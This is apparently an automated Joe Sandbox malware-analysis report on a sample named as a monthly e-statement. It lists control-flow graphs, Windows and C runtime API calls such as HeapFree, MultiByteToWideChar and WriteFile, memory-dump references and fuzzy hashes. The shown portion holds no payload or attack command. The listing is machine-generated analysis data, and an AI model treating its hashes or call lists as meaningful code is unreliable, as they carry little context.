                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                                                                                                                    • Opcode ID: f7ab550c790545e00fed4581880e5676519b0946be6918a161072b9d248add75
                                                                                                                                                                                                                                                    • Instruction ID: ac4496a54f438b9265d2ca688cb9a4f2742e9d7a0329d5420ae627965a850822
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7ab550c790545e00fed4581880e5676519b0946be6918a161072b9d248add75
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8A0113032C2028B83008F38AB8A2083AA8AA02AA0B020028A008C8020EB208080BA02

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 81 9a6507-9a651b 82 9a6589-9a6591 81->82 83 9a651d-9a6522 81->83 84 9a65d8-9a65f0 call 9a667a 82->84 85 9a6593-9a6596 82->85 83->82 86 9a6524-9a6529 83->86 93 9a65f3-9a65fa 84->93 85->84 87 9a6598-9a65d5 call 9a4869 * 4 85->87 86->82 89 9a652b-9a652e 86->89 87->84 89->82 92 9a6530-9a6538 89->92 94 9a653a-9a653d 92->94 95 9a6552-9a655a 92->95 97 9a6619-9a661d 93->97 98 9a65fc-9a6600 93->98 94->95 99 9a653f-9a6551 call 9a4869 call 9a6078 94->99 100 9a655c-9a655f 95->100 101 9a6574-9a6588 call 9a4869 * 2 95->101 108 9a661f-9a6624 97->108 109 9a6635-9a6641 97->109 103 9a6602-9a6605 98->103 104 9a6616 98->104 99->95 100->101 106 9a6561-9a6573 call 9a4869 call 9a6176 100->106 101->82 103->104 112 9a6607-9a6615 call 9a4869 * 2 103->112 104->97 106->101 116 9a6632 108->116 117 9a6626-9a6629 108->117 109->93 111 9a6643-9a6650 call 9a4869 109->111 112->104 116->109 117->116 125 9a662b-9a6631 call 9a4869 117->125 125->116
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 009A654B
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A6095
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A60A7
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A60B9
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A60CB
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A60DD
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A60EF
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A6101
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A6113
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A6125
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A6137
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A6149
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A615B
                                                                                                                                                                                                                                                      • Part of subcall function 009A6078: _free.LIBCMT ref: 009A616D
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A6540
                                                                                                                                                                                                                                                      • Part of subcall function 009A4869: HeapFree.KERNEL32(00000000,00000000,?,009A620D,?,00000000,?,00000000,?,009A6234,?,00000007,?,?,009A669F,?), ref: 009A487F
                                                                                                                                                                                                                                                      • Part of subcall function 009A4869: GetLastError.KERNEL32(?,?,009A620D,?,00000000,?,00000000,?,009A6234,?,00000007,?,?,009A669F,?,?), ref: 009A4891
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A6562
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A6577
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A6582
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A65A4
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A65B7
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A65C5
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A65D0
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A6608
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A660F
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A662C
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A6644
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                                                                                    • Opcode ID: 2ed392ca81fcc52f7c564297b3ae5696f0c7640bbf8b659991b5e8a8431de68c
                                                                                                                                                                                                                                                    • Instruction ID: 5b31e9f42d622e8aecafe0b0bc0c968af525430ded3f75156c02157e4f776823
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ed392ca81fcc52f7c564297b3ae5696f0c7640bbf8b659991b5e8a8431de68c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6315E71A00304DFEB60AA7EE805B5AB3ECEF82310F18542AF059DB191DE78ED40CB90

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 138 9a7ab4-9a7acd 139 9a7acf-9a7adf call 9a82cc 138->139 140 9a7ae3-9a7ae8 138->140 139->140 147 9a7ae1 139->147 142 9a7aea-9a7af2 140->142 143 9a7af5-9a7b19 MultiByteToWideChar 140->143 142->143 145 9a7b1f-9a7b2b 143->145 146 9a7cac-9a7cbf call 9a123a 143->146 148 9a7b7f 145->148 149 9a7b2d-9a7b3e 145->149 147->140 151 9a7b81-9a7b83 148->151 152 9a7b5d-9a7b63 149->152 153 9a7b40-9a7b4f call 9aac20 149->153 156 9a7b89-9a7b9c MultiByteToWideChar 151->156 157 9a7ca1 151->157 155 9a7b64 call 9a62ff 152->155 153->157 163 9a7b55-9a7b5b 153->163 159 9a7b69-9a7b6e 155->159 156->157 160 9a7ba2-9a7bbd call 9a5a15 156->160 161 9a7ca3-9a7caa call 9a646a 157->161 159->157 164 9a7b74 159->164 160->157 170 9a7bc3-9a7bca 160->170 161->146 167 9a7b7a-9a7b7d 163->167 164->167 167->151 171 9a7bcc-9a7bd1 170->171 172 9a7c04-9a7c10 170->172 171->161 175 9a7bd7-9a7bd9 171->175 173 9a7c5c 172->173 174 9a7c12-9a7c23 172->174 178 9a7c5e-9a7c60 173->178 176 9a7c3e-9a7c44 174->176 177 9a7c25-9a7c34 call 9aac20 174->177 175->157 179 9a7bdf-9a7bf9 call 9a5a15 175->179 184 9a7c45 call 9a62ff 176->184 180 9a7c9a-9a7ca0 call 9a646a 177->180 193 9a7c36-9a7c3c 177->193 178->180 181 9a7c62-9a7c7b call 9a5a15 178->181 179->161 191 9a7bff 179->191 180->157 181->180 195 9a7c7d-9a7c84 181->195 189 9a7c4a-9a7c4f 184->189 189->180 194 9a7c51 189->194 191->157 196 9a7c57-9a7c5a 193->196 194->196 197 9a7cc0-9a7cc6 195->197 198 9a7c86-9a7c87 195->198 196->178 199 9a7c88-9a7c98 WideCharToMultiByte 197->199 198->199 199->180 200 9a7cc8-9a7ccf call 9a646a 199->200 200->161
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,009A54C8,00000000,?,?,?,009A7D05,?,?,00000100), ref: 009A7B0E
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 009A7B46
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,009A7D05,?,?,00000100,5EFC4D8B,?,?), ref: 009A7B94
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 009A7C2B
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009A7C8E
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 009A7C9B
                                                                                                                                                                                                                                                      • Part of subcall function 009A62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,009A7E5B,?,00000000,?,009A686F,?,00000004,00000000,?,?,?,009A3BCD), ref: 009A6331
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 009A7CA4
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 009A7CC9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                    • String ID: kz]G
                                                                                                                                                                                                                                                    • API String ID: 2597970681-1940436402
                                                                                                                                                                                                                                                    • Opcode ID: 662ea1d0ca8d64d7ecda816ff06b59cc9e76c005d800bfeb50c2a4bd76742d46
                                                                                                                                                                                                                                                    • Instruction ID: 3d4d0703cb9d689cf4e7dde18baf379c0623f53bd0e363dae7bca633d317442e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 662ea1d0ca8d64d7ecda816ff06b59cc9e76c005d800bfeb50c2a4bd76742d46
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE51B172614216ABDB259FA4CC42FBBB7BAEB86760B154628FC04D7240EB34DC40D6E0

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 203 9a4330-9a4341 204 9a434d-9a43d8 call 9a4869 * 9 call 9a41f6 call 9a4246 203->204 205 9a4343-9a434c call 9a4869 203->205 205->204
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A4344
                                                                                                                                                                                                                                                      • Part of subcall function 009A4869: HeapFree.KERNEL32(00000000,00000000,?,009A620D,?,00000000,?,00000000,?,009A6234,?,00000007,?,?,009A669F,?), ref: 009A487F
                                                                                                                                                                                                                                                      • Part of subcall function 009A4869: GetLastError.KERNEL32(?,?,009A620D,?,00000000,?,00000000,?,009A6234,?,00000007,?,?,009A669F,?,?), ref: 009A4891
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A4350
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A435B
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A4366
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A4371
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A437C
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A4387
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A4392
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A439D
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A43AB
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                    • Opcode ID: 3074ea6efbab9327ca2fba8dbce47200db7c59967ccd9b6c2b2b386d9beba889
                                                                                                                                                                                                                                                    • Instruction ID: 19b5d5831c5d73b796645c3ba19315ffa4d171e42e180286b5cc0a7e64d8dbc9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3074ea6efbab9327ca2fba8dbce47200db7c59967ccd9b6c2b2b386d9beba889
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D311B976600148FFCB41EF9AE842ED97BB5EFC5750F4140A6B9084F162DA79DE509BC0

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 230 9a8417-9a8474 GetConsoleCP 231 9a847a-9a8496 230->231 232 9a85b7-9a85c9 call 9a123a 230->232 234 9a8498-9a84af 231->234 235 9a84b1-9a84c2 call 9a6052 231->235 237 9a84eb-9a84fa call 9a72b7 234->237 241 9a84e8-9a84ea 235->241 242 9a84c4-9a84c7 235->242 237->232 246 9a8500-9a8520 WideCharToMultiByte 237->246 241->237 244 9a858e-9a85ad 242->244 245 9a84cd-9a84df call 9a72b7 242->245 244->232 245->232 252 9a84e5-9a84e6 245->252 246->232 248 9a8526-9a853c WriteFile 246->248 250 9a853e-9a854f 248->250 251 9a85af-9a85b5 GetLastError 248->251 250->232 253 9a8551-9a8555 250->253 251->232 252->246 254 9a8583-9a8586 253->254 255 9a8557-9a8575 WriteFile 253->255 254->231 256 9a858c 254->256 255->251 257 9a8577-9a857b 255->257 256->232 257->232 258 9a857d-9a8580 257->258 258->254
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,009A8B8C,?,00000000,?,00000000,00000000), ref: 009A8459
                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 009A84D4
                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 009A84EF
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 009A8515
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,009A8B8C,00000000,?,?,?,?,?,?,?,?,?,009A8B8C,?), ref: 009A8534
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,009A8B8C,00000000,?,?,?,?,?,?,?,?,?,009A8B8C,?), ref: 009A856D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                    • String ID: kz]G
                                                                                                                                                                                                                                                    • API String ID: 1324828854-1940436402
                                                                                                                                                                                                                                                    • Opcode ID: cf17537c6eacfb2eb28e1a96bc5f5d5049b1836a6b5ab8c6ac5a34d031463bd9
                                                                                                                                                                                                                                                    • Instruction ID: a9db1ff18a5fcdffe5c57e1266008f56421dd1c17a900e949a5c8f754db6887b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf17537c6eacfb2eb28e1a96bc5f5d5049b1836a6b5ab8c6ac5a34d031463bd9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA519371E002499FDB10CFA8DC99AEEBBF8EF5A310F14415AF955E7291E7309941CBA0

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 259 9a1e00-9a1e51 call 9aac80 call 9a1dc0 call 9a2377 266 9a1ead-9a1eb0 259->266 267 9a1e53-9a1e65 259->267 268 9a1eb2-9a1ebf call 9a2360 266->268 269 9a1ed0-9a1ed9 266->269 267->269 270 9a1e67-9a1e7e 267->270 274 9a1ec4-9a1ecd call 9a1dc0 268->274 272 9a1e80-9a1e8e call 9a2300 270->272 273 9a1e94 270->273 282 9a1e90 272->282 283 9a1ea4-9a1eab 272->283 276 9a1e97-9a1e9c 273->276 274->269 276->270 279 9a1e9e-9a1ea0 276->279 279->269 280 9a1ea2 279->280 280->274 284 9a1eda-9a1ee3 282->284 285 9a1e92 282->285 283->274 286 9a1f1d-9a1f2d call 9a2340 284->286 287 9a1ee5-9a1eec 284->287 285->276 292 9a1f2f-9a1f3e call 9a2360 286->292 293 9a1f41-9a1f5d call 9a1dc0 call 9a2320 286->293 287->286 289 9a1eee-9a1efd call 9aaac0 287->289 297 9a1f1a 289->297 298 9a1eff-9a1f17 289->298 292->293 297->286 298->297
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 009A1E37
                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 009A1E3F
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 009A1EC8
                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 009A1EF3
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 009A1F48
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm$kz]G
                                                                                                                                                                                                                                                    • API String ID: 1170836740-1591210744
                                                                                                                                                                                                                                                    • Opcode ID: 9deb5a5a7bab78d72cc30f7e01256512401ed6baf7b19b972fbc97f4020ffcac
                                                                                                                                                                                                                                                    • Instruction ID: 25d75a03ed5cefdf69ec144956e26a92afa75b41ee03024dba6457a2a0602994
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9deb5a5a7bab78d72cc30f7e01256512401ed6baf7b19b972fbc97f4020ffcac
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE41A134A002489BCF10DF68C885A9EBBF9FF87364F248055EC199B392D735AA05CBD1

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 305 9a634d-9a6372 call 9a3f72 308 9a637f-9a63a5 MultiByteToWideChar 305->308 309 9a6374-9a637c 305->309 310 9a63ab-9a63b7 308->310 311 9a6444-9a6448 308->311 309->308 312 9a63b9-9a63ca 310->312 313 9a6403 310->313 314 9a644a-9a644d 311->314 315 9a6454-9a6469 call 9a123a 311->315 317 9a63cc-9a63db call 9aac20 312->317 318 9a63e5-9a63eb 312->318 316 9a6405-9a6407 313->316 314->315 320 9a6409-9a642b call 9a20b0 MultiByteToWideChar 316->320 321 9a643d-9a6443 call 9a646a 316->321 317->321 331 9a63dd-9a63e3 317->331 323 9a63ec call 9a62ff 318->323 320->321 333 9a642d-9a643b GetStringTypeW 320->333 321->311 328 9a63f1-9a63f6 323->328 328->321 332 9a63f8 328->332 334 9a63fe-9a6401 331->334 332->334 333->321 334->316
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,009A54C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 009A639A
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 009A63D2
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009A6423
                                                                                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 009A6435
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 009A643E
                                                                                                                                                                                                                                                      • Part of subcall function 009A62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,009A7E5B,?,00000000,?,009A686F,?,00000004,00000000,?,?,?,009A3BCD), ref: 009A6331
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                    • String ID: kz]G
                                                                                                                                                                                                                                                    • API String ID: 1857427562-1940436402
                                                                                                                                                                                                                                                    • Opcode ID: 96ef51851d1ec01c1c789df759245a571588e0eb3114470f05eae64c0a0c6d40
                                                                                                                                                                                                                                                    • Instruction ID: 9cce644d7f934345557ece86b594747cf131930fbbefa18a945ae0ce899d1bd4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96ef51851d1ec01c1c789df759245a571588e0eb3114470f05eae64c0a0c6d40
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1931EF72A0021AABDF259F64DC45EAE7BB9EF46710F094128FC14D61A0EB35CD51CBE0

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 335 9a621b-9a6226 336 9a62fc-9a62fe 335->336 337 9a622c-9a62f9 call 9a61df * 5 call 9a4869 * 3 call 9a61df * 5 call 9a4869 * 4 335->337 337->336
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 009A61DF: _free.LIBCMT ref: 009A6208
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A6269
                                                                                                                                                                                                                                                      • Part of subcall function 009A4869: HeapFree.KERNEL32(00000000,00000000,?,009A620D,?,00000000,?,00000000,?,009A6234,?,00000007,?,?,009A669F,?), ref: 009A487F
                                                                                                                                                                                                                                                      • Part of subcall function 009A4869: GetLastError.KERNEL32(?,?,009A620D,?,00000000,?,00000000,?,009A6234,?,00000007,?,?,009A669F,?,?), ref: 009A4891
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A6274
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A627F
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A62D3
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A62DE
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A62E9
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A62F4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                    • Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                                                    • Instruction ID: 6861914b4a0c126bc5dadbdfaf5300655e4a133e4b12e61dd80d0af137582fa4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
